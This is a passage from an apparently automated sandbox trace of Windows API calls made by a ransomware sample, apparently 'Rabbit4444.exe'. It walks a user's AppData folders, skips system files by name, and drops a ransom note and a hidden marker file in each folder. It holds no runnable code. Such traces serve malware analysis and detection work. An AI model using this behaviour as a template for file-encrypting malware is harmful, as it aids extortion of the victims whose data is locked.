ftLastAccessTime.dwLowDateTime=0xad2cc5cd, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xe7770877, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102750 [0050.574] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.574] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0050.574] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0050.574] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0050.574] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xad2cc5cd, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xad2cc5cd, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xe7770877, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0050.574] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.574] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0050.574] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0050.574] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0050.574] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0050.574] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe7770877, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe7770877, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe7770877, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0050.574] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.574] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0050.574] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xad2cc5cd, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xad2cc5cd, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xad2cc5cd, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Deployment", cAlternateFileName="DEPLOY~1")) returned 1 [0050.574] lstrcmpiW (lpString1="Deployment", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.574] lstrcmpiW (lpString1="Deployment", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.574] lstrcmpiW (lpString1="Deployment", lpString2="Rabbit4444.exe") returned -1 [0050.574] lstrcmpiW (lpString1="Deployment", lpString2=".") returned 1 [0050.574] lstrcmpiW (lpString1="Deployment", lpString2="..") returned 1 [0050.574] lstrcmpiW (lpString1="Deployment", lpString2="windows") returned -1 [0050.574] lstrcmpiW (lpString1="Deployment", lpString2="bootmgr") returned 1 [0050.574] lstrcmpiW (lpString1="Deployment", lpString2="pagefile.sys") returned -1 [0050.574] lstrcmpiW (lpString1="Deployment", lpString2="boot") returned 1 [0050.574] lstrcmpiW (lpString1="Deployment", lpString2="ids.txt") returned -1 [0050.574] lstrcmpiW (lpString1="Deployment", lpString2="NTUSER.DAT") returned -1 [0050.574] lstrcpyW (in: lpString1=0x130eb8a, lpString2="Deployment" | out: lpString1="Deployment") returned="Deployment" [0050.574] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf63a8 [0050.574] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x68) returned 0xee618 [0050.574] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf63b0 | out: ListHead=0xf68b0, ListEntry=0xf63b0) returned 0xf6390 [0050.574] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xad2cc5cd, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xad2cc5cd, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xad2cc5cd, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Deployment", cAlternateFileName="DEPLOY~1")) returned 0 [0050.575] FindClose (in: hFindFile=0x102750 | out: hFindFile=0x102750) returned 1 [0050.575] lstrcpyW (in: lpString1=0x130eb8a, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0050.575] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\Java\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\sun\\java\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0050.577] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0050.577] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0050.577] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.577] CloseHandle (hObject=0x278) returned 1 [0050.577] CloseHandle (hObject=0x27c) returned 1 [0050.577] GetCurrentThreadId () returned 0xd98 [0050.578] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf63b0 [0050.578] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\Java\\Deployment", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\Java\\Deployment") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\Java\\Deployment" [0050.578] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xee618 | out: hHeap=0xe0000) returned 1 [0050.578] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf63a8 | out: hHeap=0xe0000) returned 1 [0050.578] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\Java\\Deployment" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\Java\\Deployment") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\Java\\Deployment" [0050.578] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\Java\\Deployment", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\Java\\Deployment\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\Java\\Deployment\\" [0050.578] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\Java\\Deployment\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\Java\\Deployment\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\Java\\Deployment\\.BFC0E91B00AE8A0620D3" [0050.578] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\Java\\Deployment\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\sun\\java\\deployment\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0050.578] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0050.581] FlushFileBuffers (hFile=0x27c) returned 1 [0050.582] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\Java\\Deployment\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0050.582] CloseHandle (hObject=0x27c) returned 1 [0050.583] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\Java\\Deployment") returned 51 [0050.583] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0050.583] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\Java\\Deployment\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xad2cc5cd, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xad2cc5cd, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xe7796a8a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0050.583] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.583] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0050.583] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0050.583] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0050.583] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xad2cc5cd, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xad2cc5cd, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xe7796a8a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0050.583] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.583] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0050.583] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0050.583] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0050.583] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0050.583] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe7796a8a, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe7796a8a, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe7796a8a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0050.583] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.583] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0050.583] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe7796a8a, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe7796a8a, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe7796a8a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0050.583] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0050.584] lstrcpyW (in: lpString1=0x130eba0, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0050.584] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\Java\\Deployment\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\sun\\java\\deployment\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0050.584] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0050.584] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0050.584] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.584] CloseHandle (hObject=0x278) returned 1 [0050.584] CloseHandle (hObject=0x27c) returned 1 [0050.584] GetCurrentThreadId () returned 0xd98 [0050.584] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6390 [0050.584] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype" [0050.584] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf1448 | out: hHeap=0xe0000) returned 1 [0050.584] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6388 | out: hHeap=0xe0000) returned 1 [0050.585] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype" [0050.585] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype\\" [0050.585] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype\\.BFC0E91B00AE8A0620D3" [0050.585] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\skype\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0050.586] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0050.589] FlushFileBuffers (hFile=0x27c) returned 1 [0050.591] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0050.591] CloseHandle (hObject=0x27c) returned 1 [0050.592] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype") returned 37 [0050.592] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0050.592] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd5c77649, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0xd5c77649, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0xe7796a8a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 [0050.592] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.592] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0050.592] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0050.592] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0050.592] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd5c77649, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0xd5c77649, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0xe7796a8a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0050.592] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.592] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0050.592] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0050.592] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0050.592] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0050.592] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe7796a8a, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe7796a8a, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe7796a8a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0050.592] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.592] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0050.592] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd5c77649, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0xd5c77649, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0xd5c77649, ftLastWriteTime.dwHighDateTime=0x1d327b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RootTools", cAlternateFileName="ROOTTO~1")) returned 1 [0050.592] lstrcmpiW (lpString1="RootTools", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.592] lstrcmpiW (lpString1="RootTools", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.592] lstrcmpiW (lpString1="RootTools", lpString2="Rabbit4444.exe") returned 1 [0050.592] lstrcmpiW (lpString1="RootTools", lpString2=".") returned 1 [0050.592] lstrcmpiW (lpString1="RootTools", lpString2="..") returned 1 [0050.593] lstrcmpiW (lpString1="RootTools", lpString2="windows") returned -1 [0050.593] lstrcmpiW (lpString1="RootTools", lpString2="bootmgr") returned 1 [0050.593] lstrcmpiW (lpString1="RootTools", lpString2="pagefile.sys") returned 1 [0050.593] lstrcmpiW (lpString1="RootTools", lpString2="boot") returned 1 [0050.593] lstrcmpiW (lpString1="RootTools", lpString2="ids.txt") returned 1 [0050.593] lstrcmpiW (lpString1="RootTools", lpString2="NTUSER.DAT") returned 1 [0050.593] lstrcpyW (in: lpString1=0x130eb84, lpString2="RootTools" | out: lpString1="RootTools") returned="RootTools" [0050.593] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6388 [0050.593] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x60) returned 0x11cac0 [0050.593] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6390 | out: ListHead=0xf68b0, ListEntry=0xf6390) returned 0xf6370 [0050.593] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd5c77649, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0xd5c77649, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0xd5c77649, ftLastWriteTime.dwHighDateTime=0x1d327b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RootTools", cAlternateFileName="ROOTTO~1")) returned 0 [0050.593] FindClose (in: hFindFile=0x102410 | out: hFindFile=0x102410) returned 1 [0050.593] lstrcpyW (in: lpString1=0x130eb84, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0050.593] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\skype\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0050.595] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0050.595] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0050.595] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.595] CloseHandle (hObject=0x278) returned 1 [0050.595] CloseHandle (hObject=0x27c) returned 1 [0050.596] GetCurrentThreadId () returned 0xd98 [0050.596] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6390 [0050.596] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype\\RootTools", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype\\RootTools") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype\\RootTools" [0050.596] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11cac0 | out: hHeap=0xe0000) returned 1 [0050.596] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6388 | out: hHeap=0xe0000) returned 1 [0050.596] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype\\RootTools" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype\\RootTools") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype\\RootTools" [0050.596] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype\\RootTools", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype\\RootTools\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype\\RootTools\\" [0050.596] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype\\RootTools\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype\\RootTools\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype\\RootTools\\.BFC0E91B00AE8A0620D3" [0050.596] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype\\RootTools\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\skype\\roottools\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0050.597] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0050.600] FlushFileBuffers (hFile=0x27c) returned 1 [0050.601] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype\\RootTools\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0050.601] CloseHandle (hObject=0x27c) returned 1 [0050.601] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype\\RootTools") returned 47 [0050.601] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0050.601] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype\\RootTools\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd5c77649, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0xd5c77649, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0xe77bcd0b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0050.601] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.601] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0050.601] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0050.602] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0050.602] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd5c77649, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0xd5c77649, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0xe77bcd0b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0050.602] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.602] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0050.602] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0050.602] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0050.602] 